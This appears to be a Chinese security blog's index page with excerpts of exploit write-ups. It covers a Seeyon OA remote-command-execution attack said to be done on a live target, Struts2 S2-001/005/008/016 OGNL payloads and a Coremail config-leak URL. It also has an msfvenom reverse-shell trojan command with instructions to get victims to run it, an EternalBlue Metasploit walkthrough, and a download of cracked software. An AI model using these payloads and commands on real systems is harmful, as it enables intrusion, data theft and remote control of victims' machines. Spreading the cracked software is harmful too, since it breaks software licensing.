Zeo's Security Lab

致远OA-A8系统的0day远程命令执行的实战 1.环境是实战，漏洞已经提交，打码子处理 2.详细漏洞信息和修补参考CNVD官网查看https://www.cnvd.org.cn/webinfo/show/5095 3漏洞影响范围 4漏洞的复现 第一步 第二步 第三步 附上POC 请勿用非法用途，只供研究和学习 1.环境是实战，漏洞已经提交，打码子处理2.详细漏洞信息和修补参考CNVD官网查看https://www.cnvd.org.cn/webinfo/show/50953漏洞影响范围漏洞影响的产品版本包括： 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件V7.1 4漏洞的复现先采集一波url，找到对应版本，这个就不细说了 第一步先访问这个路径，看有没有开启远程Servlet接口暴露 1/seeyon/htmlofficeservlet 成功反馈 第二步搞出Burp进行改包，上POC发包 回包这算是写入了 第三步调用命令执行访问 /test123456.jsp? ...

【研究】Struts2漏洞之S2-016漏洞环境和POC 1.环境 2.原理 3.影响版本 4.利用过程 POC POC注意 1.环境环境https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md这个搭环境很方便快捷，具体可以看说明，很简单 2.原理 在struts2中，DefaultActionMapper类支持以”action:”、“redirect:”、”redirectAction:”作为导航或是重定向前缀，但是这些前缀后面同时可以跟OGNL表达式，由于struts2没有对这些前缀做过滤，导致利用OGNL表达式调用java静态方法执行任意系统命令。 所以，访问http://your-ip:8080/index.action?redirect:OGNL表达式即可执行OGNL表达式。 3.影响版本Struts 2.0.0 - Struts 2.3.15 4.利用过程环境打开 POC此漏洞用的是get传输即可实现，直接加就好 1?redirect:${%23a%3d(new java.lang.Pr ...

【研究】Struts2漏洞之S2-008漏洞环境和可用POC 1.环境 2.原理 3.影响版本 4.利用过程 POC 有效POC’’ POC注意 1.环境环境https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md这个搭环境很方便快捷，具体可以看说明，很简单 2.原理1参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html S2-008 涉及多个漏洞，Cookie 拦截器错误配置可造成 OGNL 表达式执行，但是由于大多 Web 容器（如 Tomcat）对 Cookie 名称都有字符限制，一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令，正如 kxlzx 所提这种情况在生产环境中几乎不可能存在，因此就变得很鸡肋的，但我认为也不是绝对的，万一被黑了专门丢了一个开 ...

【研究】Struts2漏洞之S2-005漏洞环境和可用POC 1.环境 2.原理 3.影响版本 4.利用过程 POC 1.环境环境https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md这个搭环境很方便快捷，具体可以看说明，很简单 2.原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)，struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象，struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制，对于S2-003漏洞，官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补，但是安全配置被绕过再次导致了漏洞，攻击者可以利用OGNL表达式将这2个选项打开，S2-003的修补方案把自己上了一个锁，但是把锁钥匙给插在了锁头上 XWork会将GET参数的键和值利用OGNL表达式解析成Ja ...

【研究】Struts2漏洞之S2-001漏洞环境和POC 1.环境 2.原理 3.影响版本 4.利用过程 POC 1.环境环境https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md这个搭环境很方便快捷，具体可以看说明，很简单 2.原理 该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value}对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行 3.影响版本Struts 2.0.0 - Struts 2.0.8 4.利用过程环境打开![在这里插入图片描述][图片上传失败…(image-5bcfcf-1563099334703)] 这个漏洞的问题在于可以直接输入和直接回显将POC粘到一个输入框，点击Submit此后会将数据提交到后端，后端检测值是否为空，然后返回，满足漏洞前提 POC获取 ...

漏洞介绍Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统，开始研发于1999年 [1] ，其前身为中国第一套中文电子邮件系统163\126，目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商，以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业，截止2019年，Coremail邮件系统产品在国内已拥有10亿终端用户 [2] ，已成为中国用户实际使用最广泛的电子邮件系统。 2019年5月22日，国家信息安全漏洞共享平台（CNVD）收录了由北京天融信网络安全技术有限公司报送的Coremail邮件系统信息泄露漏洞（CNVD-2019-16798）。由于Coremail邮件系统的mailsms模块的参数大小写敏感存在缺陷，使得攻击者利用该漏洞，在未授权的情况下，通过远程访问URL地址获知Coremail服务器的系统配置文件，造成数据库连接参数等系统敏感配置信息泄露。 **泄露页： POC:1/mailsms/s?func=ADMIN:appState&dumpConfig=/ **利用方式： 1 ...

Android反编译(apktool、dex2jar、jd-gui）三件套教程这个是网上流行的使用工具，我现在重新写一下屡一下思路 apk反编译软件有个组合套餐：apktool 、dex2jar、jd-jui， 我直接打包好了一套工具，也配置好了，使用可以直接用剩的再收集麻烦w这个下载地址：https://download.csdn.net/download/god_zzz/11241989 简单介绍一下，大概了解一下各自是干什么的：## apktool 可以反编译软件的布局文件、xml文件、AndroidManifest.xml和图片等。 ## dex2jar 将apk反编译成java源码，也就是说把classes.dex转化成jar文件，反编译源码 ## jd-gui源码文件转化成jar文件，这个打开直接查看jar的源码 ** 开始反编译 第一步下载好工具和要测试的apk 然后使用 apktool使用注意 要确保他们三个在一个文件夹里面，然后打开CMD命令把路径切到这里 使用命令 1apktool d -f ***.apk ![在这里插入图片描述](https:// ...

因为之前52的安装教程贴被删除了所以我自己重新记录一下方便以后的使用也是自己用的环境 -—我用的是2019的ubantu和Xshell 下载地址https://download.csdn.net/download/god\_zzz/11238215里面有三个：： 一个安装包一个破解文件一个安装说明 ** 下面开始安装** 安装环境依赖（如果有问题先更新一下源） root@kali:~# sudo apt-get install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 \-y 正在读取软件包列表… 完成 正在分析软件包的依赖关系树 正在读取状态信息… 完成 libxss1已经是最新版 (1:1.2.3-1)。 libxss1 已设置为手动安装。 将会同时安装下列软件： libasound2-datalibgtk-3-common libxdamage-dev 建议安装： alsa-utils 下列软件包将被升级：libasound2 libasound2-data libgtk-3-0 libgtk-3-common ...

刚刚试了下永恒之蓝，看到有人用木马，也补一下后面的其他环境和那一片的一样 msfvenom模块，首先生成.exe木马文件 1msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe 1.exe 就是木马 要把这个用各种方法去受害机运行 ![在这里插入图片描述](https://image-1257110520.cos.ap-beijing.myqcloud.com/2019060616093520.png2. 输入msfconsole进入metasploi3. 进入监听模块 1use exploit/multi/handler 设置payload反弹 1set payload windows/meterpreter/reverse_tcp 设置监听ip端口 123set lhost 10.77.0.109set lport 4443要与木马一致 运行![在这里插入图片描述](https://image-125711052 ...

试验环境(内网地址) -win7（未打补丁开445） 10.77.0.128 kali 10.77.0.109 首先信息收集，探测 nmap意思一下 - nmap \-sS \-P0 \-A \-v 10.77.0.100 扫描漏洞 msfconsole 启动 1msfconsole 加载扫描exp use auxiliary/scanner/smb/smb_ms17_010 1show options 设置目标ip 1set RHOST 10.77.0.128 运行 1run ![在这里插入图片描述](https://image-1257110520.cos.ap-beijing.myqcloud.com/20190606140644531.png用 漏洞利用 加载攻击模块 1use exploit/windows/smb/ms17_010_eternalblue 设置参数 1set RHOST 10.77.0.128 运行 1run ![在这里插入图片描述](https://image-1257110520.cos.a ...